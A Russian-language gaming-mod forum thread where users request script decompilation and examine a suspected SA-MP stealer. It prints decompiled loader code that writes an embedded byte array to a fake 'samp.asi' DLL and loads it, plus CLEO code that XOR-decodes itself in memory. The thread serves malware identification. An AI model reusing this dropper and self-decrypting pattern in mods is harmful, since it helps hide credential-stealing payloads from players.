Декомпиляция скриптов

FYP · 14 Авг 2017

Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:

Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
- Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.

YoniXX · 16 Авг 2021

Help me remove the encryption because it is very strange it creates a file named SAMP.ASI

That he steals information from the game and sends it to the site
How is the ASI file (DLL) better?
Because according to the code I do not understand how


function someFunc0 ()
    var_0_0 = {} --to find out the contents of this table look inside the lua file
    s = var_0_0
    var_0_0 = io.open ("samp.asi", "wb")
    fq = var_0_0
    for var_0_3, var_0_4 in pairs (s) do --var_0_0 FORTEST-FORTEST
        var_0_6 = fq
        var_0_8 = var_0_4
        fq.write (var_0_6, string.char (var_0_8))
    end --end of a for loop
    io.close (fq)
    var_0_1 = loadDynamicLibrary ("samp.asi")
    biil = var_0_1
    lib = var_0_0
    return
end


[/ ICODE]

damag · 16 Авг 2021

YoniXX написал(а):
Help me remove the encryption because it is very strange it creates a file named SAMP.ASI

That he steals information from the game and sends it to the site
How is the ASI file (DLL) better?
Because according to the code I do not understand how
function someFunc0 () var_0_0 = {} --to find out the contents of this table look inside the lua file s = var_0_0 var_0_0 = io.open ("samp.asi", "wb") fq = var_0_0 for var_0_3, var_0_4 in pairs (s) do --var_0_0 FORTEST-FORTEST var_0_6 = fq var_0_8 = var_0_4 fq.write (var_0_6, string.char (var_0_8)) end --end of a for loop io.close (fq) var_0_1 = loadDynamicLibrary ("samp.asi") biil = var_0_1 lib = var_0_0 return end [/ ICODE]

stealer.
the script converts the bytes from the array to working code and then adds it to the game.

YoniXX · 16 Авг 2021

Lemonager написал(а):
loader, stealer

Which DECOMPLIED are you using?
I am using decompile036 and it gave something different on the vv.luac code


function someFunc0 ()
    var_0_0 = {} --to find out the contents of this table look inside the lua file
    s = var_0_0
    var_0_0 = io.open ("sampdebug.asi", "wb")
    fq = var_0_0
    for var_0_3, var_0_4 in pairs (s) do --var_0_0 FORTEST-FORTEST
        var_0_6 = fq
        var_0_8 = var_0_4
        fq.write (var_0_6, string.char (var_0_8))
    end --end of a for loop
    io.close (fq)
    var_0_1 = loadDynamicLibrary ("sampdebug.asi")
    biil = var_0_1
    lib = var_0_0
    return
end


 [/ ICODE]

damag написал(а):
stealer.
the script converts the bytes from the array to working code and then adds it to the game.

Yes I now see unfortunately my DECOMPILER does not display it Can you give me your DUCOMPILER?
It's STEALER I want it to remove the encryption and if possible know how because I did not find anything know it's STEALER only after activation it creates all the junk in a folder like SAMP.BAT, and the extra ASI file

TTpocToXaKep · 17 Авг 2021

damag написал(а):
stealer.
the script converts the bytes from the array to working code and then adds it to the game.

+реп, я хотел уже отвечать, молодец что работаешь, помогаешь

YoniXX написал(а):
Which DECOMPLIED are you using?
I am using decompile036 and it gave something different on the vv.luac code
function someFunc0 () var_0_0 = {} --to find out the contents of this table look inside the lua file s = var_0_0 var_0_0 = io.open ("sampdebug.asi", "wb") fq = var_0_0 for var_0_3, var_0_4 in pairs (s) do --var_0_0 FORTEST-FORTEST var_0_6 = fq var_0_8 = var_0_4 fq.write (var_0_6, string.char (var_0_8)) end --end of a for loop io.close (fq) var_0_1 = loadDynamicLibrary ("sampdebug.asi") biil = var_0_1 lib = var_0_0 return end [/ ICODE]

Yes I now see unfortunately my DECOMPILER does not display it Can you give me your DUCOMPILER?
It's STEALER I want it to remove the encryption and if possible know how because I did not find anything know it's STEALER only after activation it creates all the junk in a folder like SAMP.BAT, and the extra ASI file

Ну на только тыкни спасибо под этим ответом я долго удалял hex и оставил только чистый код если что он КАРАБАВКА (СТИЛЛЕР)

СПАСИБО тыкнул ? :I а я хексы удалял :(:

// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}
{$USE bitwise}
{$USE CLEO+}
{$USE file}
{$USE newOpcodes}
0000: NOP

0002: jump -34963
896F:   not car 2.372295E-23 street_racing_car
8BC2:   not samp send_passenger_data
09FE: reset_hydraulics_on_car
0BCF: samp send_interior_change
0B57: samp  = player  animation_id
8F0D:   not
0C90:  samp is_client_command_defined
8F0D:   not
08E1:  = total_tags_sprayed
0003: shake_camera
0006: 1@ = 34956
0006: 2@ = 0
0085: 5@ = 0@ // (int)
000E: 5@ -= 7

:NONAME_35005
802D:   not  2@ >= 1@ // (int)
004D: jump_if_false @NONAME_35084
0A8D: 3@ = read_memory 0@ size 1 virtual_protect 1
0B12: 4@ = 3@ XOR -54
0A8C: write_memory 5@ size 1 value 4@ virtual_protect 1
000A: 0@ += 1
000A: 2@ += 1
000A: 5@ += 1
0002: jump @NONAME_35005

:NONAME_35084
0A9F: 0@ = current_thread_pointer
0A8E: 1@ = 0@ + 16 // int
0A8D: 2@ = read_memory 1@ size 4 virtual_protect 1
000A: 1@ += 4
0A8C: write_memory 1@ size 4 value 2@ virtual_protect 1

YoniXX написал(а):
give me your DUCOMPILER?

All decompiletors expired, i'm didn't use it :) Only hex redactor and Sanny Biled (if i see virus i check in avp too)
Закинул код и оборзел:

YoniXX написал(а):
function someFunc0 () var_0_0 = {} --to find out the contents of this table look inside the lua file s = var_0_0 var_0_0 = io.open ("sampdebug.asi", "wb") fq = var_0_0 for var_0_3, var_0_4 in pairs (s) do --var_0_0 FORTEST-FORTEST var_0_6 = fq var_0_8 = var_0_4 fq.write (var_0_6, string.char (var_0_8)) end --end of a for loop io.close (fq) var_0_1 = loadDynamicLibrary ("sampdebug.asi") biil = var_0_1 lib = var_0_0 return end [/ ICODE]

It is stealler code

kizn · 17 Авг 2021

TTpocToXaKep написал(а):
Мда игнорить легчайшую работу
Не юзабельно к переделке, т.к раскрывает кашу чисто чек как робит и всё

используй этот декомпилятор: https://gitlab.com/znixian/luajit-decompiler

Chadik · 17 Авг 2021

decompile pls

Gruzin Gang · 17 Авг 2021

Chadik написал(а):
decompile pls

Chadik · 17 Авг 2021

decompile ewe pls ))

woodware · 17 Авг 2021

Chadik написал(а):
decompile ewe pls ))

Chadik · 17 Авг 2021

Chadik написал(а):
decompile ewe pls ))

актуально

lemonager · 17 Авг 2021

Chadik написал(а):
актуально

TTpocToXaKep · 18 Авг 2021

Kaleriy Valashnikov написал(а):
используй этот декомпилятор: https://gitlab.com/znixian/luajit-decompiler

Не хочу пайтоновский

RAYDON · 18 Авг 2021

я точно знаю, что это вредонос, нужен код

Lolendor · 18 Авг 2021

RAYDON написал(а):
я точно знаю, что это вредонос, нужен код

Самый дефолтный, склееный с обычным скриптом (первый файл лодер, второй скрипт)

FL1pSTaR_01 · 18 Авг 2021

Кто то сможет декриптовать этот файл?

Декомпиляция скриптов

Известный

Новичок

Вложения

Женюсь на официантке в моем любимом баре

Вложения

Новичок

Вложения

Активный

О КУ)))

Новичок

Вложения

Всефорумный Грузин

Вложения

Новичок

Вложения

Потрачен

Вложения

Новичок

;)

Вложения

Активный

Известный

Вложения

вотофак

Вложения

Новичок

Вложения

Похожие темы